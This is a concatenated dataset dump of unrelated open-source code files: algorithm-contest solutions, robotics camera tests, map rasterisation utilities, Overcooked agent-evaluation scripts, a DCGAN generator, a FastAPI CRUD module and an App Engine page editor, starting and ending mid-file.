self.assertTrue(self.camera.get_projection_mode() == \"orthographic\")\n self.camera.set_stereo_role(\"left\")\n self.assertTrue(self.camera.get_stereo_role() == \"left\")\n self.camera.set_fisheye_polynomial_properties(\n nominal_width=120,\n nominal_height=240,\n optical_centre_x=24,\n optical_centre_y=25,\n max_fov=560,\n polynomial=[1, 2, 3, 4, 5],\n )\n nominal_width, nominal_height, optical_centre_x, optical_centre_y, max_fov, polynomial = (\n self.camera.get_fisheye_polynomial_properties()\n )\n self.assertTrue(math.isclose(nominal_width, 120, abs_tol=2))\n self.assertTrue(math.isclose(nominal_height, 240, abs_tol=2))\n self.assertTrue(math.isclose(optical_centre_x, 24, abs_tol=2))\n self.assertTrue(math.isclose(optical_centre_y, 25, abs_tol=2))\n self.assertTrue(math.isclose(max_fov, 560, abs_tol=2))\n self.assertTrue(np.isclose(polynomial, [1, 2, 3, 4, 5]).all())\n self.camera.set_shutter_properties(delay_open=2.0, delay_close=3.0)\n delay_open, delay_close = self.camera.get_shutter_properties()\n self.assertTrue(math.isclose(delay_open, 2.0, abs_tol=0.1))\n self.assertTrue(math.isclose(delay_close, 3.0, abs_tol=0.1))\n self.camera.set_resolution((300, 300))\n resolution = self.camera.get_resolution()\n self.assertTrue(math.isclose(resolution[0], 300, abs_tol=0.1))\n self.assertTrue(math.isclose(resolution[1], 300, abs_tol=0.1))\n self.camera.get_aspect_ratio()\n self.camera.get_horizontal_fov()\n self.camera.get_vertical_fov()\n return\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.sensor/omni/isaac/sensor/tests/test_camera_sensor.py","file_name":"test_camera_sensor.py","file_ext":"py","file_size_in_byte":8952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43518159362","text":"# 폴란드 왕자 구사과는 다음과 같은 수를 좋아한다.\r\n#\r\n# 0과 1로만 이루어져 있어야 한다.\r\n# 1이 적어도 하나 있어야 한다.\r\n# 수의 길이가 100 이하이다.\r\n# 수가 0으로 시작하지 않는다.\r\n# 예를 들어, 101은 구사과가 좋아하는 수이다.\r\n#\r\n# 자연수 N이 주어졌을 때, N의 배수 중에서 구사과가 좋아하는 수를 구하는 프로그램을 작성하시오.\r\n\r\nfrom collections import deque\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\ndef BFS(N):\r\n queue = deque([(1, \"1\")])\r\n visited = [False] * 20001\r\n visited[1] = True\r\n\r\n while queue:\r\n current_num, current_str = queue.popleft()\r\n # 만약 만들어진 현재 숫자가 N의 배수라면?\r\n if current_num % N == 0:\r\n return current_str\r\n # 만약 구사과가 좋아하는 수의 길이가 100을 넘어선다면?\r\n if len(current_str) > 100:\r\n return \"BRAK\"\r\n # 1을 뒤에 붙이는 경우\r\n if not visited[((current_num * 10) + 1) % N]:\r\n visited[((current_num * 10) + 1) % N] = True\r\n queue.append([(((current_num * 10) + 1) % N), current_str + \"1\"])\r\n # 0을 뒤에 붙이는 경우\r\n if not visited[(current_num * 10) % N]:\r\n visited[(current_num * 10) % N] = True\r\n queue.append([((current_num * 10) % N), current_str + \"0\"])\r\n return \"BRAK\"\r\n\r\nT = int(input())\r\nfor i in range(T):\r\n N = int(input().strip())\r\n print(BFS(N))","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"8000~8999/8111.py","file_name":"8111.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23145151215","text":"#!/usr/bin/env python\n\n\"\"\"\nSome utilities for fetching open street map labels.\n\"\"\"\n\nimport cv2\nimport gdal\nimport json\nimport numpy as np\nimport shapely.geometry\n\n\ndef read_multipolygon(geojson_path, buffer_size=1e-5):\n \"\"\"\n Reads a geojson and converts the result into a Multipolygon\n \"\"\"\n geojson = json.load(open(geojson_path, 
\"r\"))\n geoms = []\n for feature in geojson[\"features\"]:\n geom = shapely.geometry.shape(feature[\"geometry\"])\n if geom.geom_type != \"Polygon\":\n geom = geom.buffer(buffer_size)\n geoms.append(geom)\n\n poly = shapely.ops.cascaded_union(\n shapely.geometry.MultiPolygon(geoms)\n )\n\n return shapely.geometry.MultiPolygon(geoms)\n\n\ndef im_bounds(path):\n \"\"\"\n Get the latitude and longitude coordinates for lower right and upper left\n corners of geotiff image\n \"\"\"\n gdal_obj = gdal.Open(path)\n ulx, xres, xskew, uly, yskew, yres = gdal_obj.GetGeoTransform()\n lrx = ulx + (gdal_obj.RasterXSize * xres)\n lry = uly + (gdal_obj.RasterYSize * yres)\n return {\"lr\": [lrx, lry], \"ul\": [ulx, uly]}\n\n\ndef raster_coords(coords, img_size, bbox):\n \"\"\"\n Convert original coordinates into indices in an image\n \"\"\"\n for j in [0, 1]:\n coords[:, j] -= bbox[\"lr\"][j]\n coords[:, j] *= (img_size[j] + 1) / (bbox[\"ul\"][j] - bbox[\"lr\"][j])\n coords[:, j] = img_size[j] - coords[:, j]\n\n return np.round(coords).astype(np.int32)\n\n\ndef multipoly_contours(polygon_list, img_size, bbox):\n \"\"\"\n Given a generic polygon, get coordinates for the contours\n \"\"\"\n if not polygon_list:\n return [], []\n\n to_ind = lambda x: np.array(list(x)).astype(np.float32)\n perim = [\n raster_coords(to_ind(poly.exterior.coords), img_size, bbox)\n for poly in polygon_list\n ]\n inter = [\n raster_coords(to_ind(poly.coords), img_size, bbox)\n for poly_ex in polygon_list for poly in poly_ex.interiors\n ]\n\n return perim, inter\n\n\ndef make_mask(contours, img_size, class_id=1):\n \"\"\"\n Generate a mask, given contours\n \"\"\"\n perim, inter = contours\n m = np.zeros(img_size, np.uint8)\n\n if not perim:\n return m\n\n cv2.fillPoly(m, perim, class_id)\n cv2.fillPoly(m, inter, 0)\n return m\n","repo_name":"krisrs1128/map_labels","sub_path":"src/raster.py","file_name":"raster.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2344250018","text":"import sys\n\nn = int(sys.stdin.readline())\n\ndp = [[0, 0, 0] for _ in range(n + 1)]\ndp[1][0], dp[1][1], dp[1][2] = 1, 1, 1 # n = 1일 때, 3가지 경우의 수\n\n# 점화식 : n번째 우리의 사자가 없는 경우와 왼쪽에 있을 경우와 오른쪽의 있을 경우로 나눠서 수행\nfor i in range(2, n + 1):\n dp[i][0] = (dp[i - 1][0] + dp[i - 1][1] + dp[i - 1][2]) % 9901 # 없을 경우\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % 9901 # 왼쪽에 있을 경우\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % 9901 # 오른쪽에 있을 경우\n\nprint(sum(dp[n]) % 9901) # n번째 우리의 사자를 배치하는 경우의 수의 합을 출력\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Dynamic_Programming/1309.py","file_name":"1309.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2787427523","text":"\nfrom overcooked_ai_py.agents.agent import AgentPair\nfrom overcooked_ai_py.mdp.overcooked_mdp import OvercookedGridworld\nfrom overcooked_ai_py.mdp.overcooked_env import OvercookedEnv\nimport copy\nimport numpy as np\nfrom overcooked_ai_py.planning.planners import MediumLevelPlanner\nfrom human_aware_rl.ppo.ppo_pop import make_tom_agent\nfrom human_ai_robustness.import_person_params import import_manual_tom_params\nfrom argparse import ArgumentParser\nimport matplotlib.pyplot as plt\nfrom human.process_dataframes import get_human_human_trajectories\n\nno_counters_params = {\n 'start_orientations': False,\n 'wait_allowed': False,\n 'counter_goals': [],\n 'counter_drop': [],\n 
'counter_pickup': [],\n 'same_motion_goals': True\n}\n\ndef make_tom_pop(prob_pausing_factor):\n \"\"\"Make a population of TOMs\n params: ?\"\"\"\n\n ALL_TOM_PARAMS = []\n # Agents with a fixed \"personality type\":\n for prob_greedy in range(2):\n for prob_obs_other in range(2):\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.9, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.7})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0.8, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 2,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.5})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 0.5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0.4,\n 'COMPLIANCE_TOM': 0.5, 'PATH_TEAMWORK_TOM': 0.5, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.6})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0.2,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n\n # Agents that fluctuate between different types\n values = [[0.7, 0.3], [0.3, 0.7]]\n for i in range(len(values)):\n prob_greedy, prob_obs_other = values[i]\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.9, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.7})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0.8, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 2,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.5})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 0.5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0.4,\n 'COMPLIANCE_TOM': 0.5, 'PATH_TEAMWORK_TOM': 0.5, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.6})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0.2,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n\n return ALL_TOM_PARAMS\n\ndef get_stats(scores):\n \"\"\"Get stats such 
as mean, median, range, SD\"\"\"\n stats_dict = {}\n stats_dict['median'] = np.median(scores)\n stats_dict['mean'] = np.mean(scores)\n stats_dict['std'] = np.std(scores)\n print('\\nSCORE STATS: ', stats_dict, '\\n')\n return stats_dict\n\ndef plot_scores_dist(scores, title):\n \"\"\"Plot the distribution of the scores\"\"\"\n colours = ['b', 'r', 'y', 'c', 'm', 'g']\n f, ax = plt.subplots(1, 1, sharex='col', sharey='row')\n x_axis = [i for i in range(len(scores))]\n ax.bar(x_axis, np.sort(scores), 0.4, alpha=0.4, color=colours)\n ax.title.set_text(title)\n ax.set_ylabel('score')\n ax.set_xlim(0, len(x_axis))\n ax.grid()\n plt.tight_layout()\n plt.show()\n\ndef get_human_human_data_scores(layouts):\n \"\"\"Load human human data, for layouts, for both train and test.\"\"\"\n\n expert_data = []\n expert_data.append(get_human_human_trajectories(layouts, 'train'))\n expert_data.append(get_human_human_trajectories(layouts, 'test'))\n\n # Combine ALL the ep_returns into a single vector, \"scores\":\n scores = []\n for layout in layouts:\n for i in range(2):\n for j in range(len(expert_data[i][layout]['ep_lengths'])):\n # Check the ep_lengths are 1200 \\pm 100.\"\"\"\n assert 1100 < expert_data[i][layout]['ep_lengths'][j] < 1300, \"Data trajectories have unexpected length!\"\n scores.append(expert_data[i][layout]['ep_returns'][j])\n return scores\n\nif __name__ == \"__main__\":\n \"\"\"Create a pop of (30?) TOMs, then play each TOM with itself on each layout. Then print a bunch of stats about the \n performance of the TOMs, e.g. median score, mean score, range, SD. And plot the scores.\"\"\"\n\n parser = ArgumentParser()\n parser.add_argument(\"-a\", \"--num_avg\",\n help=\"number of rollouts to avg over\", required=False, default=1, type=int)\n parser.add_argument(\"-t\", \"--testing\",\n help=\"whether we're testing or not\", required=False, default=\"False\")\n parser.add_argument(\"-hd\", \"--hh_data\",\n help=\"Get stats for human-human data, instead of generating TOM data\",\n required=False, default=\"False\")\n parser.add_argument(\"-hz\", \"--horizon\", help=\"Game horizon\", required=False, default=1200, type=int)\n parser.add_argument(\"-l\", \"--layout\", help=\"e.g. 'cramped_room' or 'all'\", required=False, default='all')\n parser.add_argument(\"-pf\", \"--prob_pausing_factor\", help=\"Factor to adjust the param prob_pausing by. E.g. 
if 0.5 then \"\n \"all prob_pausing values will be half of the default value (which is in import_person_params)\", required=False, default=1, type=float)\n\n args = parser.parse_args()\n num_avg, testing, hh_data, horizon, prob_pausing_factor, layout \\\n = args.num_avg, args.testing, args.hh_data, args.horizon, args.prob_pausing_factor, args.layout\n\n layouts = ['cramped_room', 'asymmetric_advantages', 'coordination_ring', 'counter_circuit'] \\\n if layout is 'all' else [layout]\n\n if not hh_data == \"True\":\n # Generate TOM data then get stats on the performance\n\n # Make the TOM params:\n ALL_TOM_PARAMS = make_tom_pop(prob_pausing_factor)\n\n # Stuff that can be done outside the loop:\n cook_time = 20\n start_order_list = 100 * ['any']\n\n scores = []\n\n # Loop over layouts:\n for layout_name in layouts:\n\n print('Layout: {}'.format(layout_name))\n\n mdp = OvercookedGridworld.from_layout_name(layout_name, start_order_list=start_order_list,\n cook_time=cook_time, rew_shaping_params=None)\n no_counters_params['counter_drop'] = mdp.get_counter_locations()\n no_counters_params['counter_goals'] = mdp.get_counter_locations()\n mlp = MediumLevelPlanner.from_pickle_or_compute(mdp, no_counters_params, force_compute=False)\n env = OvercookedEnv(mdp, horizon=horizon)\n\n # Make the TOM pop for this mlp:\n tom_pop = []\n for this_tom_params in ALL_TOM_PARAMS:\n tom_pair = []\n for i in range(2):\n tom_agent = make_tom_agent(mlp)\n tom_agent.set_tom_params(None, None, [this_tom_params], tom_params_choice=0)\n tom_pair.append(tom_agent)\n tom_pop.append(tom_pair)\n num_toms = len(ALL_TOM_PARAMS) if testing != \"True\" else 2\n\n # Find score for each TOM:\n for i in range(num_toms):\n agent_pair = AgentPair(tom_pop[i][0], tom_pop[i][1])\n trajs = env.get_rollouts(agent_pair, num_games=num_avg, final_state=False, display=False)\n sparse_rews = trajs[\"ep_returns\"]\n avg_sparse_rew = np.mean(sparse_rews)\n if avg_sparse_rew < 150:\n print(\"Poor score on {}: {}\\n{}\".format(layout_name, avg_sparse_rew, ALL_TOM_PARAMS[i]))\n scores.append(avg_sparse_rew)\n print('\\n\\n\\nScore this TOM: {}\\n\\n\\n'.format(avg_sparse_rew))\n title = \"TOM pop sp scores over all layouts\"\n\n elif hh_data == \"True\":\n # Get human-human data\n scores = get_human_human_data_scores(layouts)\n title = \"H+H data scores over all layouts\"\n\n else:\n raise ValueError\n\n stats_dict = get_stats(scores)\n plot_scores_dist(scores, title)\n","repo_name":"HumanCompatibleAI/human_ai_robustness","sub_path":"human_ai_robustness/analyse_optimise_agents/tom_pop_stats_SP.py","file_name":"tom_pop_stats_SP.py","file_ext":"py","file_size_in_byte":10793,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"33472147294","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python\n#\n# See:\n# \t\thttps://docs.python.org/3.5/library/filesys.html\n# \t\thttps://docs.python.org/3.5/library/shutil.html\n#\n\nimport os\nimport argparse\nfrom pathlib import Path\nimport random\n\nclass FileSamplerException(Exception):\n\tpass\n\nclass Sampler(object):\n\n\tdef __init__(self, input, output, sampleSize, writeFileList=False):\n\t\tself.input = input\n\t\tself.output = output\n\t\tself.sampleSize = sampleSize\n\t\tself.writeFileList = writeFileList\n\n\tdef fileList(self):\n\t\tcurrentPath = Path(self.input)\n\t\tl = [pathitem.name for pathitem in currentPath.iterdir() if not(pathitem.is_dir())]\n\t\treturn l\n\n\tdef sample(self):\n\t\tl = self.fileList()\n\t\tsample = random.sample(l, 
self.sampleSize)\n\t\tif self.writeFileList:\n\t\t\tf = open(self.output+os.sep+\"sampleList.txt\", 'w')\n\t\t\tfolder = self.input+os.sep\n\t\t\tfor item in sample:\n \t\t\t\tf.write(\"%s%s\\n\" % (folder, item))\n\t\t\tf.close()\n\t\treturn sample\n\n\tdef validate(self):\n\t\ttry:\n\t\t self.checkValidSampleSize()\n\t\texcept (FileSamplerException):\n\t\t print(\"Invalid size of sample.\")\n\t\texcept:\n\t\t print(\"An unexpected error occurred\")\n\t\t raise\n\n\t\treturn True\n\n\tdef checkValidSampleSize(self):\n\t\tfileList = self.fileList()\n\t\tif len(fileList) <= self.sampleSize:\n\t\t\traise FileSamplerException(\"Invalid sample size.\")\n\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"inputFolder\", help=\"The input folder to where extract the samples\")\n\tparser.add_argument(\"outputFolder\", help=\"The output folder to place the sampled files\")\n\tparser.add_argument(\"sampleSize\", help=\"Size of the sample to consider\", type=int)\n\tparser.add_argument(\"--writeFileList\", help=\"Whether to sample the files or just return a file with the list of files\", type=int, nargs='?')\n\targs = parser.parse_args()\n\n\tsampler = Sampler(args.inputFolder, args.outputFolder, args.sampleSize, args.writeFileList)\n\tsampler.sample()\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","repo_name":"juan88/filesampler","sub_path":"filesampler.py","file_name":"filesampler.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35738991399","text":"from math import log2\n\nimport torch\nimport torch.nn as nn\nfrom common.base_module import BaseModule\nfrom settings import settings\n\n\ndef _init_weights(m):\n if type(m) == nn.ConvTranspose2d:\n torch.nn.init.xavier_normal(m.weight, gain=2)\n if type(m) == nn.BatchNorm2d:\n torch.nn.init.uniform_(m.weight, -1, 1)\n\n\nclass Generator(BaseModule):\n def __init__(self, input_vector_size: int = 100, output_size: tuple = (64, 64, 3), feature_maps: int = 64, **_):\n super(Generator, self).__init__()\n self.input_vector_size = input_vector_size\n self.output_size = output_size\n self.feature_maps = feature_maps\n self.num_conv_layers = int(log2(output_size[0] / 4) - 1) # -1 perché poi aggiungo il layer finale\n\n self.conv_list = []\n self.conv_list.append(\n nn.ConvTranspose2d(input_vector_size, feature_maps * 2 ** self.num_conv_layers, 4, 1, 0, bias=False))\n self.conv_list.append(nn.BatchNorm2d(feature_maps * 2 ** self.num_conv_layers))\n self.conv_list.append(nn.LeakyReLU(inplace=True, negative_slope=0.2))\n # state size is (feature_maps * 2 ** num_conv_layers) x 4 x 4\n\n for i in range(1, self.num_conv_layers + 1):\n self.conv_list.append(nn.ConvTranspose2d(feature_maps * 2 ** (self.num_conv_layers - i + 1),\n feature_maps * 2 ** (self.num_conv_layers - i),\n 4, 2, 1, bias=False))\n self.conv_list.append(nn.BatchNorm2d(feature_maps * 2 ** (self.num_conv_layers - i)))\n self.conv_list.append(nn.LeakyReLU(inplace=True, negative_slope=0.2))\n # state size is (feature_maps * 2^(num_conv_layers - i)) x (4 x 2^i) x (4 x 2^i)\n\n # state size is (feature_maps) x (output_size[0] / 2) x (output_size[0] / 2)\n self.conv_list.append(nn.ConvTranspose2d(feature_maps, output_size[2], 4, 2, 1, bias=False))\n self.conv_list.append(nn.Tanh())\n self.conv_layer = nn.Sequential(*self.conv_list)\n\n def forward(self, x):\n return self.conv_layer(x)\n\n def init_weights(self):\n 
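Editor's note on the `filesampler.py` record above: the `f.write` line inside `sample()` mixes a leading space with tabs (a `TabError` in Python 3), and `checkValidSampleSize` also rejects `len(files) == sample_size`, which `random.sample` would happily accept. A hedged rework of the sampler core:

```python
# Corrected core of the sampler: pathlib listing plus random.sample,
# with consistent indentation and an inclusive size check.
import random
from pathlib import Path

def sample_files(input_dir, sample_size):
    files = [p.name for p in Path(input_dir).iterdir() if not p.is_dir()]
    if len(files) < sample_size:
        raise ValueError("Invalid sample size.")
    return random.sample(files, sample_size)

print(sample_files('.', 1))  # assumes the cwd holds at least one file
```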
self.apply(_init_weights)\n\n def set_preprocessing_params(self, params):\n params['mean'] = [0.5]\n params['std'] = [0.5]\n return params\n\n def get_weights_filename(self):\n return f'dcgan_generator_isz{self.input_vector_size}_osz{self.output_size[0]}_fm{self.feature_maps}' \\\n f'_v{settings.dcgan_model_version}.pt'\n","repo_name":"Daniangio/model_training","sub_path":"projects/dcgan/modules/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16863589581","text":"# built-in\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\n# external\nfrom dephell_venvs import VEnvs\nfrom packaging.utils import canonicalize_name\n\n# app\nfrom ..actions import format_size, get_path_size, make_json\nfrom ..config import builders\nfrom ..converters import InstalledConverter\nfrom .base import BaseCommand\n\n\nclass JailShowCommand(BaseCommand):\n \"\"\"Show info about the package isolated environment.\n \"\"\"\n find_config = False\n\n @staticmethod\n def build_parser(parser) -> ArgumentParser:\n builders.build_config(parser)\n builders.build_venv(parser)\n builders.build_output(parser)\n builders.build_other(parser)\n parser.add_argument('name', help='jail name')\n return parser\n\n def __call__(self) -> bool:\n venvs = VEnvs(path=self.config['venv'])\n name = canonicalize_name(self.args.name)\n venv = venvs.get_by_name(name)\n if not venv.exists():\n self.logger.error('jail does not exist', extra=dict(package=name))\n return False\n\n # get list of exposed entrypoints\n entrypoints_names = []\n for entrypoint in venv.bin_path.iterdir():\n global_entrypoint = Path(self.config['bin']) / entrypoint.name\n if not global_entrypoint.exists():\n continue\n if not global_entrypoint.resolve().samefile(entrypoint):\n continue\n entrypoints_names.append(entrypoint.name)\n\n root = InstalledConverter().load(paths=[venv.lib_path], names={name})\n version = None\n for subdep in root.dependencies:\n if subdep.name != name:\n continue\n version = str(subdep.constraint).replace('=', '')\n\n data = dict(\n name=name,\n path=str(venv.path),\n entrypoints=entrypoints_names,\n version=version,\n size=dict(\n lib=format_size(get_path_size(venv.lib_path)),\n total=format_size(get_path_size(venv.path)),\n ),\n )\n\n print(make_json(\n data=data,\n key=self.config.get('filter'),\n colors=not self.config['nocolors'],\n table=self.config['table'],\n ))\n return True\n","repo_name":"dephell/dephell","sub_path":"dephell/commands/jail_show.py","file_name":"jail_show.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"23222475267","text":"from fastapi import HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom .. 
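Editor's note on the DCGAN `Generator` record above: its layer count comes from `int(log2(output_size[0] / 4) - 1)`. The first transposed conv maps the 1x1 latent to 4x4, each `(kernel 4, stride 2, pad 1)` block doubles the spatial size, and one final upsampling layer is added outside the loop, so the arithmetic closes. A torch-free check of that sizing:

```python
# Quick check of the layer-count arithmetic in the DCGAN generator above:
# 4x4 seed, `num_conv_layers` doublings in the loop, plus one final doubling.
from math import log2

def generator_resolution(output_size):
    num_conv_layers = int(log2(output_size / 4) - 1)
    size = 4                 # after the initial 1x1 -> 4x4 transposed conv
    for _ in range(num_conv_layers):
        size *= 2            # stride-2 transposed conv block
    size *= 2                # final ConvTranspose2d + Tanh
    return size

assert generator_resolution(64) == 64
assert generator_resolution(128) == 128
```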
import models, schemas\n\n\ndef get_all(db: Session):\n ingredientes = db.query(models.Ingrediente).order_by(models.Ingrediente.nombre_ingrediente).all()\n return ingredientes\n\n\ndef create(request: schemas.Ingrediente, db: Session):\n new_ingrediente = models.Ingrediente(nombre_ingrediente=request.nombre_ingrediente,\n cantidad_calorias=request.cantidad_calorias,\n id_categoria=request.id_categoria)\n db.add(new_ingrediente)\n db.commit()\n db.refresh(new_ingrediente)\n return new_ingrediente\n\n\ndef show(id: int, db: Session):\n ingrediente = db.query(models.Ingrediente).filter(models.Ingrediente.id_ingrediente == id).first()\n if not ingrediente:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"El ingrediente con id {id} no existe\")\n return ingrediente\n","repo_name":"Nutricionapp/api","sub_path":"NutricionApp/repository/ingrediente.py","file_name":"ingrediente.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28053881977","text":"from datetime import datetime\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import template\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom sintjan.business.settings import RequestContext\r\nfrom sintjan.business.model import Page, BlockLink\r\nfrom sintjan.controllers import util\r\nimport sintjan.business\r\n\r\n\r\nclass EditPage(webapp.RequestHandler):\r\n def get(self):\r\n if util.checkAuth(self, False):\r\n page = self.getPageItem(self.request)\r\n\r\n values = {\r\n 'context':RequestContext(),\r\n 'page': page,\r\n 'blockLeft': self.getBlockLinkByRegion('left', page),\r\n 'blockFooter': self.getBlockLinkByRegion('footer', page)\r\n }\r\n\r\n self.response.out.write(template.render('templates/admin/pageEdit.html', values))\r\n\r\n def post(self):\r\n if util.checkAuth(self, False):\r\n page = self.getPageItem(self.request)\r\n \r\n page.url = self.request.get('url')\r\n page.title = self.request.get('title')\r\n page.content = self.request.get('content')\r\n page.breadcrumb = self.request.get('breadcrumb')\r\n\r\n if len(page.url)>0 and len(page.title)>0:\r\n page.put()\r\n\r\n # Creating the left block\r\n name = self.request.get('blockLeft')\r\n\r\n if len(name)>0:\r\n blockLink = self.getBlockLinkByRegion('left', page)\r\n blockLink.name = self.request.get('blockLeft')\r\n blockLink.put()\r\n\r\n # Creating the footer block\r\n name = self.request.get('blockFooter')\r\n\r\n if len(name)>0:\r\n blockLink = self.getBlockLinkByRegion('footer', page)\r\n blockLink.name = self.request.get('blockFooter')\r\n blockLink.put()\r\n\r\n self.redirect('/admin/page/all?status=ok', permanent=False)\r\n\r\n else:\r\n values = {\r\n 'context':RequestContext(),\r\n 'page':page,\r\n 'blockLeft': self.getBlockLinkByRegion('left', page),\r\n 'blockFooter': self.getBlockLinkByRegion('footer', page),\r\n 'error':True\r\n }\r\n\r\n self.response.out.write(template.render('templates/admin/pageEdit.html',values))\r\n\r\n def getPageItem(self, request):\r\n # POST id\r\n id = sintjan.business.util.parseint(request.get('id'),0)\r\n\r\n #GET id\r\n if id<1:\r\n id = sintjan.business.util.parseint(request.get('pageid'),0)\r\n\r\n if id>0:\r\n page = Page.get_by_id(id)\r\n else:\r\n user = users.get_current_user()\r\n\r\n page = Page()\r\n page.createdOn = datetime.now()\r\n page.createdBy = user.user_id()\r\n page.url = request.get('path')\r\n page.title = \"\"\r\n 
